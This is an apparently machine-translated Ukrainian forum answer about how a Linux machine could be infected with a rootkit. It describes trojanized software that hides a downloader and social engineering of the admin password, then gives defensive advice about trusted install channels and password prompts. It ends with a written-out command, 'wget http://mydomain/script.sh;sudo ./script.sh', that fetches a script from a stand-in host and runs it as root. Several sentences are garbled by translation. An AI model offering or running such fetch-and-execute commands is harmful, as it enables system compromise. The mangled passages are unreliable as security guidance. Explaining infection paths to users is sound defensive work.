Якби це я, я переконав би наступний метод:
- Запропонуйте користувачу завантажити та встановити частину програмного забезпечення (№1). Запропонуйте це програмне забезпечення встановити програмне забезпечення, яке передбачено. Сховати двійкову крапку всередині цього додатка дозволяє завантажувати програмне забезпечення (тобто інструмент, який можна використовувати для ftp, wget тощо).
- Запросіть обліковий запис адміністратора (# 2) і скористайтеся ним, щоб використовувати ftp, wget екземпляр для завантаження та встановлення rootkit.
Щодо №1: користувач ніколи не повинен завантажувати випадкове програмне забезпечення під час використання Linux; використовуйте відповідні канали (Ubuntu Software Center) для встановлення програмного забезпечення. Якщо це програмне забезпечення, яке потрібно завантажувати за межами відповідних каналів, переконайтеся, що джерелу завантаження можна довіряти. Подумайте про останні версії програмного забезпечення Apache або MySQL. Не займайтеся завантаженням випадкового програмного забезпечення, не перевіряючи різні соціальні медіа про цілісність цієї програми. Microsoft ніколи не централізоване програмне забезпечення; це призвело до того, що багато людей кидаються у відповідь на програмне забезпечення, тому їх база користувачів є надзвичайною, але це також спростило зайти до комп'ютерів та почати збирати дані, які вони можуть продати.
Щодо № 2: фатальний недолік користувача. Ніколи ніколи не вводив пароль свого адміністратора, якщо не знаєш, чому його запитують.
wget http://mydomain/script.sh;sudo ./script.sh